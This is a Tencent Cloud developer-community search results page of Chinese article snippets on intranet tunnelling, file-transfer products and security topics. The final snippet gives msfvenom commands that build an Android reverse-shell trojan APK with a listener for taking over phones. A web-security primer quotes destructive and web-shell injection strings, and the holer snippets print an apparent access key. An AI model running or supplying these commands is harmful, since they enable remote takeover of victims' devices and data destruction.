- 综合排序
- 最热优先
- 最新优先
- 来自专栏holer
外网访问内网Linux系统
本地安装了一个Linux系统,只能在局域网内访问到,怎样从外网也能访问到本地的Linux系统呢?本文将介绍具体的实现步骤。 1. 准备工作 1.1 启动Linux系统 默认Linux系统ssh服务端端口是22; 检查Linux系统连网是否正常,通过命令: ping www.holer.org 即可检查。 2. --------------------- Holer Client : holerdemo@gmail.com Access Key : 8866daebe02846t88s166733595fff5d /holer-xxx-xxx -k 8866daebe02846t88s166733595fff5d & 2.4 访问映射后的公网地址 在ssh客户端工具上输入主机名:holer.org,端口号: 65014 就可以从外网访问本地的Linux系统了。
16.1K40发布于 2018-11-14 内外网导入导出系统
企业内外网文件安全传输解决方案基于零信任架构的智能中转系统设计一、业务背景与挑战分析1.1 企业网络安全现状在数字化转型浪潮下,企业面临着前所未有的安全挑战。 根据《2024年中国企业网络安全报告》显示,83%的企业在内外网文件传输过程中存在安全风险,其中数据泄露事件年增长率达到27%。 1.2 核心痛点深度剖析主要包括安全性风险维度、运营效率维度、管理可视化维度:企业内外网文件传输挑战分析图二、解决方案架构设计2.1 设计理念:零信任安全框架零信任核心原则架构图2.2 整体系统架构图三层安全传输架构图 2.3 网络安全架构设计层安全防护体系架构图三、核心业务流程设计3.1 出向传输流程(内网→外网)内网到外网文件传输时序图3.2 入向传输流程(外网→内网)外网到内网文件传输时序图3.3 智能威胁检测流程 AI驱动的智能威胁检测流程图四、安全防护体系4.1 多维度安全防护架构存储层安全加密存储:静态数据AES-256加密,密钥HSM硬件保护访问控制:基于ABAC(属性访问控制)的细粒度权限管理生命周期管理
21820编辑于 2025-07-29- 来自专栏萝卜要加油
5分钟内给你的关键系统添加监控
引言:那个谁也不敢动的“老系统” 在每家企业里,总有那么一个“遗留系统”: 运行了十几年,从 COBOL 到 Java,不停地打补丁,但从没人敢改。 问题是,当它出问题时,你什么都看不见: 系统是否卡死?哪一段代码最耗时?有没有内存泄漏? 完全不可观测,就像在黑暗中驾驶。 对那些“没人敢动”的旧系统来说,这几乎是唯一的安全选项。 ️ 阶段 1:基础健康监控 — 系统还能活得下去吗? ✅ 目标 在完全不改动源代码的前提下,快速了解系统的运行健康状况。 通过简单地引入 opentelemetry-javaagent, 你就能做到: ✅ 零代码改动 ✅ 快速可视化系统健康状况 ✅ 自动追踪性能瓶颈 ✅ 降低运维风险,为未来重构积累数据 也许你的系统很老 它也能帮我们一点点地理解、修复、改进那些看似不可触碰的旧系统。(这也是为什么现在单体应用又有取代微服务的趋势的原因之一) 让可观测性从“新系统标配”, 变成“遗留系统的救命稻草”。
20910编辑于 2025-11-14 - 来自专栏内网穿透工具
全国范围内连锁药店,如何安全访问总部运营系统?
除常见的ERP供应链管理系统、客户管理系统(CRM)及线上线下库存一体化系统外,医疗行业特有的合规管理系统、药品追溯与供应链合规平台也成为关键支撑。 由于上述系统涉及大量顾客个人信息、健康数据及敏感经营信息,且需满足严格的合规管理要求,业务系统本地化部署已成为保障数据安全合规、控制运维成本的优先选择。 从底层保障数据传输安全。 此外,平台提供多维度状态监控与多渠道告警通知功能,可实时掌握系统运行状态;通过精细化的“访问控制”模块,支持按IP地址设置访问权限,针对网页操作端还可额外配置访问密码验证,构建多层次安全防护体系,完全契合医药企业严苛的安全管理标准 确认信息无误后点击「确定」,系统将自动生成HTTPS外网访问地址,通过浏览器输入该地址即可实现远程访问。管理人员可借此地址对医药软件进行实时数据监控、权限调配及业务流程管理等操作,提升跨区域管理效率。
30810编辑于 2025-08-21 内外网文件导入导出系统
内外网文件导入导出系统是什么? 可以实现在企业内外网物理隔离的网络环境之下,进行信息的安全交换(文件导入、文件输出)、通过该系统进行线上文件导入导出任务提交,并对传输文件进行实施病毒查杀,进行在线审批流程、实现在线审计。 1. 内外网文件导入导出系统是企业内部实现高效文件传输的管理系统: 支持用户通过光盘导入所需文件或文件夹; 2. 支持将内网终端文件经审批后刻录至光盘,实现安全输出; 3. 内置杀毒引擎,对传输文件进行实时扫描,确保文件安全无风险; 4. 支持超大文件及文件夹的高效导入与导出,满足多样化传输需求; 5. 四、部分演示导入申请导入文件导出申请系统管理个人待办日志审计总结内外网文件导入导出系统安全可靠、跨隔离网文件传输、高性能高扩展性、审批审计高效便捷。
31500编辑于 2025-07-29- 来自专栏Windows技术交流
安全软件奇安信导致内外网不通
安装完奇安信天擎之后,机器内、外网络均不通。图片要么进行实名认证或资产自助登记,要么卸载软件。
9.7K60编辑于 2022-07-26 内外网文件导出导出审计系统
内外网互传文件 安全、可控、便捷的跨网数据交换,内外网文件导出导出系统。 解决企业数字化痛点,重新定义文件传输标准 在数字化转型浪潮中,企业面临着前所未有的挑战:内网系统需要严密防护,外网协作又要高效便民。如何在网络安全与业务效率之间找到完美平衡? 内外网文件互传技术应运而生,为企业构建起一座安全可靠的"数据桥梁"。 :定期输出安全风险评估报告,持续优化安全策略 性能优化建议:基于使用数据提供系统优化建议 ⚡ 便捷高效:化繁为简的用户体验 操作简单直观 拖拽式操作:支持文件拖拽上传,如同操作本地文件夹一样简单 批量处理 选择专业的内外网文件互传解决方案,不仅是对数据安全的负责,更是对企业未来发展的投资。
35511编辑于 2025-07-29- 来自专栏腾讯安全
打卡天津,腾讯安全在安全周招呼您内!
目的地天津,“安全战略官”来嘞! 作为互联网安全领先品牌,腾讯安全致力于成为产业数字化升级进程中的安全战略官。 在今年的网络安全周现场,腾讯安全这个“安全战略官”也带来了具体的作战武器——四大行业解决方案、市场领先安全产品矩阵、安全行业联盟矩阵、腾讯安全联合实验室矩阵、腾讯安全公益,全方位呈现产业互联网时代先进的安全能力 聚焦产业互联网,四大安全解决方案助力产业安全升级 “安全战略官”进发第一站自然是备受社会关注的产业互联网。腾讯安全针对产业互联网时代的安全痛点和形势,打造了四大行业安全解决方案。 保障网络系统和信息安全,助力用户实现全景生命周期安全运营与管理。 一个小秘密——即将上线的iOS 13系统,也搭载了腾讯手机管家反诈能力。
90630发布于 2019-09-16 - 来自专栏CBeann的博客
从jar包内复制文件到系统目录内
其实比较简单的方法就是我在的SpringBoot的resources目录下放置helloworld.sh,如果jar包启动的时候,能把该helloword.sh复制到当前linux操作系统我规定的目录下 args) throws Exception { // window();//window上复制文件 linux(); // linux上复制文件 } /** 在window系统上把 InputStream inputStream = App.class.getClassLoader().getResourceAsStream("myfile/secret.txt"); // 获得的系统的根目录 FileUtils.copyToFile(inputStream, targetFile); // 记得关闭流 inputStream.close(); } /** 在window系统上把 classPathResource.getInputStream(); String targetFileName = "D:\\others\\temp\\temp\\secret_win.txt"; // 获得的系统的根目录
63210编辑于 2023-12-25 - 来自专栏holer
外网访问ARM嵌入式Linux系统
外网访问ARM嵌入式Linux系统 实验室里的ARM嵌入式Linux系统,只能在局域网内访问,怎样从外网也能访问ARM嵌入式Linux系统? 本文将介绍具体的实现步骤。 1. 准备工作 1.1 安装并启动ARM嵌入式Linux系统 ARM嵌入式Linux系统默认的sshd端口是22。 2. --------------------- Holer Client : holerdemo@gmail.com Access Key : 8866daebe02846t88s166733595fff5d /holer-linux-armxx -k 8866daebe02846t88s166733595fff5d & 2.4 访问映射后的公网地址 在ssh客户端上输入 主机名:holer.org 端口号: 65014 或者直接执行命令: ssh root@holer.org -p 65014 这样就可以从外网访问ARM嵌入式Linux系统了。
5.2K10发布于 2018-11-15 - 来自专栏数据猿
内生安全,是数据安全厂商的蜜糖还是砒霜?
内生安全,作为一种新兴的安全理念,强调从系统设计之初就将安全作为核心考量,从而实现更为根本和全面的保护。 市场需求的转变,尤其是对于数据安全法等法规遵从的需求,进一步推动了内生安全的发展。 此外,Fortinet 的Security Fabric框架旨在实现不同安全设备和解决方案之间的协同,以提供更加紧密和有效的安全防护。 5. 奇安信提出了内生安全的理念,并开发了内生安全框架,旨在帮助政府和企业从信息化系统内部生长出具有自主、自成长、自适应特点的安全能力。 公司还积极参与国家网络安全相关的重大项目和研究,通过技术创新提升内生安全能力。 5. 与传统安全相比,内生安全更注重系统内部的安全防护能力,它通过在系统架构中内置安全控制点,实现了从芯片到云的全栈安全。
57410编辑于 2024-05-17 - 来自专栏Qt项目实战
Qt编写的项目作品5-气体安全管理系统
可删除指定时间范围内的数据,支持自动清理早期数据,设置最大保存记录数。 数据库采集模式可以作为通用的系统使用。 自带设备模拟工具,支持16个设备数据模拟,同时还带数据库数据模拟,以便在没有设备的时候测试数据。 默认通信协议采用modbus协议,后期增加mqtt等物联网协议的支持,做成通用系统。 支持所有windows操作系统+linux操作系统和其他操作系统。 二、效果图 [sams.gif] [samstool.gif] [ubuntu2.png] 三、体验地址 体验地址:https://pan.baidu.com/s/1uQsDQO5E5crUBN2J-nPeLQ
1.2K30发布于 2020-03-19 - 来自专栏闪石星曜CyberSecurity
国内外网络安全现状与存在的问题
No.1 我国网络安全现状 随着人工智能、大数据、5G等新兴技术的发展,企业面临的威胁日益增加。相关数据显示,在2015年至2025这十年间,网络攻击引发的全球潜在经济损失可能高达2940亿美元。 各国纷纷颁布数据保护方面的法律法规,我国自2017年6月开始实行《网络安全法》。2019年5月,我国发布了等级保护2.0 国家标准,增加了个人信息保护、云计算扩展等要求。 国家互联网应急中心从恶意程序、漏洞隐患、移动互联网安全、网站安全以及云平台安全、工业系统安全、互联网金融安全等方面,对我国互联网网络安全环境开展宏观监测。 1月,荷兰三大银行网络系统在一周内不断遭受分布式拒绝服务攻击。6月,美国赛门铁克公司发现黑客组织针对美国和东南亚国家卫星通讯、电信、地理太空拍摄成像服务和军事系统进行网络攻击。 9月,发布《国防部网络安全战略》,指出中国和俄罗斯对美国及其盟国的战略性威胁正在增大,为防范网络攻击要进行先发制人。 二是完善网络空间作战机构设置。5月,美国网络司令部升格为独立作战司令部。
6.8K21发布于 2020-09-28 企业内外网物理隔离时文件怎么传输更安全
一、物理隔离环境下的文件传输安全挑战在等保2.0和《数据安全法》的合规要求下,企业内外网物理隔离虽能阻断网络层攻击,却衍生出文件传输效率与安全的矛盾。 :传输过程不可控:缺乏内容级审计与实时阻断能力行为追溯不完整:操作日志缺失用户身份、地理围栏等关键信息合规成本高昂:人工审计报告生成效率低下,难以满足等保更高要求二、Next-FileFlow的差异化安全架构该产品通过 全生命周期合规管理智能审批流引擎:支持会签/或签多级审批,与钉钉/企业微信深度集成,审批效率提升90%取证级审计日志:记录文件从提交到清理的22项元数据,自动生成符合ISO27001的审计报告自动化清理机制:敏感文件下载后7天内自动擦除存储痕迹
43410编辑于 2025-08-05- 来自专栏HACK学习
【零基础】学习 Web 安全 | 内附彩蛋
如果在操作系统层上没处理好,比如Linux的Bash环境把“特殊数据”当做指令执行时,就产生了OS命令执行的安全问题,这段“特殊数据”可能长得如下这般: ; rm -rf /; 2. 如果在Web开发框架或Web应用层中没处理好,把“特殊数据”当做指令执行时,可能会产生远程命令执行的安全问题,这段“特殊数据”可能长得如下这般: eval($_REQUEST['x']); 5. ActionScript、HTML/CSS的话,我估计我要研究好XSS是很困难的,我熟悉这些语言刚开始的出发点是想“创造”,我做了好些Flash动画、做了好些网站、包括自己从后端到前端独立实现过一个博客系统 零基础如何学习 Web 安全? 研究逆向,二进制 自己写POC,EXP,去写远控,研究免杀 甚至还想去挖掘操作系统的0day 来源:知乎 一入安全深似海,从此女友是路人
1.1K50发布于 2019-08-07 - 来自专栏绿盟科技研究通讯
解析5G安全(二):5G安全需求
随着5G的快速建设,5G的安全问题亟待解决。解决5G的安全问题,首先要明确5G的安全需求。 、数据篡改等安全风险;终端自身的软件安全需要考虑操作系统安全和运行于上的各类应用安全,攻击者可以通过对软件系统发起注入攻击、钓鱼攻击从而控制和更改终端软件。 可通过加锁、人员管理等方式保障物理环境安全。其次,可信计算和可信IO接入的引入也可以保障物理服务器的可信。 虚拟基础设施需要应对多维度的安全风险,包括宿主机操作系统、容器和虚拟机。 为加强宿主机操作系统安全性,可以对操作系统进行基础检查、漏洞扫描、病毒和木马防范、升级及补丁管理;为加强容器和虚拟机安全性,可设计有效的隔离机制,关闭无关端口、并对东西向流量进行安全检测。 在明确了5G的安全需求后,下一篇文章我们将对这些安全需求提出相应的安全举措,同时提出一种面向切片服务的多级协同安全防护机制,希望为5G安全防护提供一个新的视角。
8.5K22发布于 2019-12-11 - 来自专栏逸鹏说道
5.怎么以域名的形式来浏览网站(内网 + 外网)?
有人会问了,那外网的呢? 如果你有独立的DNS服务器,那么可以在注册域名的地方设置一下自己的DNS服务器 ? 一般来说,我们都是绑定服务器,用域名提供商提供的DNS ?
3.7K110发布于 2018-04-10 - 来自专栏京程一灯
在 10 分钟内实现安全的 React + Docker
另外,你还可以通过配置网络服务器来发送安全标头,这样使你的程序更安全。 在短短几分钟内就把你的 React 应用做了 docker 化。? 把将你的 React App 部署到 Heroku 你的应用要直到正式投入生产时才会真正的存在,所以让我们把它部署到 Heroku。 在带有安全标头的根目录中创建一个 static.json 文件,并把所有 HTTP 请求重定向到 HTTPS。 你可以在 https://securityheaders.com 上验证其安全标头是否正确。 ? 在这个部署示例中,buildpacks 为你完成了所有工作。 为了解决这个问题,修改你的 nginx.config 添加安全头。
23K30发布于 2020-05-26 内外网文件传输系统解决方案
内外网文件传输系统解决方案 企业内外网物理隔离,如何进行内外网文件传输、安全传输,成为一大难题,试想: 当敏感图纸面临跨网泄露风险、当金融交易数据需满足合规审计、当医疗档案流转缺乏追溯手段 ——传统以人工审批和物理介质为核心的文件交换系统,已成为企业数字化进程中的“血栓”。 内外网文件交换系统(内外网文件导入导出系统-Next-FileFlow ) 基于AI驱动的全栈式安全传输平台,将「高效传输」与「零信任风控」深度融合,为企业构建 “流动可控、行为可溯、风险可视” 的下一代文件交换中枢 病毒扫描仅覆盖基础风险✅ AI深度防御:敏感内容语义识别+高危代码扫描+动态水印溯源❌ 审批与审计分离,追溯困难✅ 全链路闭环管控:传输-审批-审计-清理自动化联动❌ 物理介质易引发人为泄密✅ 虚拟安全摆渡 /WebDAV 全协议打通,无缝接入现有IT生态▶︎ 军工级传输保障:国密算法加密通道,TB文件分片加速,传输效率提升300%▶︎ 弹性带宽调度:自动识别业务优先级,保障核心数据流“零延迟”AI驱动的安全中枢
33510编辑于 2025-07-31- 来自专栏黑客技术家园
kali Linux外网渗透控制Android安卓手机系统。
Kali常用配置和基本使用 1.外网步骤思想图 Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成test.apk ----->监听当前Ip是否点击---->目标电脑发送 exe---->点击test.apk 1.根据攻击机系统情况下载客户端版本这里下载Linux 64bita版本 2. /sunny clientid id =>隧道id 启动了当前窗口不要关闭 3、MSF生成外网木马 不加Tcp| 端口不然报错 msfvenom -p android/meterpreter/reverse_tcp LHOST=外网穿透的ip地址 LPORT=外网穿透端口 R >/home/test.apk 4、打开msf设置payload加载攻击模块设置本地IP和监听端口 msfconsole 开启 5.绑定当前端口
4.8K10编辑于 2024-03-11
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号